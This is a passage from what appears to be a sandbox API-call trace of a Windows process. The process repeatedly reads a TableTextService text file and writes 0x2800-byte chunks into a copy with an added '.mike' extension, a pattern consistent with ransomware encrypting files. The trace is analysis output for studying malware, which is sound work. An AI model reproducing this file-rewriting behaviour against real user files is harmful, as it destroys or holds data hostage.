nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21e9678*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.556] CloseHandle (hObject=0x284) returned 1 [0130.556] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.556] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.556] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.556] GetFileType (hFile=0x284) returned 0x1 [0130.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.556] GetFileType (hFile=0x284) returned 0x1 [0130.557] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.557] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.557] GetFileType (hFile=0x284) returned 0x1 [0130.557] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.557] GetFileType (hFile=0x284) returned 0x1 [0130.557] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0xf220 [0130.557] WriteFile (in: hFile=0x284, lpBuffer=0x21f66f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x21f66f8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.557] CloseHandle (hObject=0x284) returned 1 [0130.557] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.558] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.558] GetFileType (hFile=0x284) returned 0x1 [0130.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.558] GetFileType (hFile=0x284) returned 0x1 [0130.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.558] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.558] GetFileType (hFile=0x284) returned 0x1 [0130.558] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.558] GetFileType (hFile=0x284) returned 0x1 [0130.558] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x11a20 [0130.559] WriteFile (in: hFile=0x284, lpBuffer=0x2203778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2203778*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.559] CloseHandle (hObject=0x284) returned 1 [0130.559] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.559] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.559] GetFileType (hFile=0x284) returned 0x1 [0130.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.559] GetFileType (hFile=0x284) returned 0x1 [0130.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.560] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.560] GetFileType (hFile=0x284) returned 0x1 [0130.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.560] GetFileType (hFile=0x284) returned 0x1 [0130.560] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x14220 [0130.560] WriteFile (in: hFile=0x284, lpBuffer=0x22107f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x22107f8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.561] CloseHandle (hObject=0x284) returned 1 [0130.561] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.561] GetFileType (hFile=0x284) returned 0x1 [0130.561] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.561] GetFileType (hFile=0x284) returned 0x1 [0130.561] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.561] GetFileType (hFile=0x284) returned 0x1 [0130.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.562] GetFileType (hFile=0x284) returned 0x1 [0130.562] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x16a20 [0130.562] WriteFile (in: hFile=0x284, lpBuffer=0x221d878*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x221d878*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.562] CloseHandle (hObject=0x284) returned 1 [0130.562] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.562] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.562] GetFileType (hFile=0x284) returned 0x1 [0130.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.562] GetFileType (hFile=0x284) returned 0x1 [0130.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.563] GetFileType (hFile=0x284) returned 0x1 [0130.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.563] GetFileType (hFile=0x284) returned 0x1 [0130.563] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x19220 [0130.563] WriteFile (in: hFile=0x284, lpBuffer=0x222a8f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x222a8f8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.563] CloseHandle (hObject=0x284) returned 1 [0130.564] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.564] GetFileType (hFile=0x284) returned 0x1 [0130.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.564] GetFileType (hFile=0x284) returned 0x1 [0130.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.564] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.564] GetFileType (hFile=0x284) returned 0x1 [0130.564] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.565] GetFileType (hFile=0x284) returned 0x1 [0130.565] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x1ba20 [0130.565] WriteFile (in: hFile=0x284, lpBuffer=0x2237978*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2237978*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.565] CloseHandle (hObject=0x284) returned 1 [0130.565] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.565] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.565] GetFileType (hFile=0x284) returned 0x1 [0130.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.565] GetFileType (hFile=0x284) returned 0x1 [0130.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.566] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.566] GetFileType (hFile=0x284) returned 0x1 [0130.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.566] GetFileType (hFile=0x284) returned 0x1 [0130.567] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x1e220 [0130.567] WriteFile (in: hFile=0x284, lpBuffer=0x22449f8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x22449f8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.567] CloseHandle (hObject=0x284) returned 1 [0130.567] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.567] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.567] GetFileType (hFile=0x284) returned 0x1 [0130.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.567] GetFileType (hFile=0x284) returned 0x1 [0130.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.569] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.569] GetFileType (hFile=0x284) returned 0x1 [0130.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.569] GetFileType (hFile=0x284) returned 0x1 [0130.569] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x20a20 [0130.569] WriteFile (in: hFile=0x284, lpBuffer=0x2251a78*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2251a78*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.569] CloseHandle (hObject=0x284) returned 1 [0130.569] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.570] GetFileType (hFile=0x284) returned 0x1 [0130.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.570] GetFileType (hFile=0x284) returned 0x1 [0130.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.571] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.571] GetFileType (hFile=0x284) returned 0x1 [0130.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.571] GetFileType (hFile=0x284) returned 0x1 [0130.571] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x23220 [0130.571] WriteFile (in: hFile=0x284, lpBuffer=0x225eaf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x225eaf8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.571] CloseHandle (hObject=0x284) returned 1 [0130.572] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.572] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.572] GetFileType (hFile=0x284) returned 0x1 [0130.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.572] GetFileType (hFile=0x284) returned 0x1 [0130.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.573] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.573] GetFileType (hFile=0x284) returned 0x1 [0130.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.573] GetFileType (hFile=0x284) returned 0x1 [0130.573] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x25a20 [0130.573] WriteFile (in: hFile=0x284, lpBuffer=0x226bb78*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x226bb78*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.573] CloseHandle (hObject=0x284) returned 1 [0130.574] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.574] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.574] GetFileType (hFile=0x284) returned 0x1 [0130.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.574] GetFileType (hFile=0x284) returned 0x1 [0130.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.575] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.575] GetFileType (hFile=0x284) returned 0x1 [0130.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.575] GetFileType (hFile=0x284) returned 0x1 [0130.575] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x28220 [0130.575] WriteFile (in: hFile=0x284, lpBuffer=0x2278bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2278bf8*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.575] CloseHandle (hObject=0x284) returned 1 [0130.576] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.576] GetFileType (hFile=0x284) returned 0x1 [0130.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af070) returned 1 [0130.576] GetFileType (hFile=0x284) returned 0x1 [0130.577] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af084) returned 1 [0130.577] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt.mike" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.577] GetFileType (hFile=0x284) returned 0x1 [0130.577] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af080) returned 1 [0130.577] GetFileType (hFile=0x284) returned 0x1 [0130.577] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af058*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af058*=0) returned 0x2aa20 [0130.577] WriteFile (in: hFile=0x284, lpBuffer=0x2285c78*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af124, lpOverlapped=0x0 | out: lpBuffer=0x2285c78*, lpNumberOfBytesWritten=0x2af124*=0x2800, lpOverlapped=0x0) returned 1 [0130.579] CloseHandle (hObject=0x284) returned 1 [0130.579] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt", lpFilePart=0x0) returned 0x5a [0130.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af074) returned 1 [0130.579] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows NT\\TableTextService\\TableTextServiceSimplifiedShuangPin.txt" (normalized: "c:\\program files (x86)\\windows nt\\tabletextservice\\tabletextservicesimplifiedshuangpin.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0130.579] 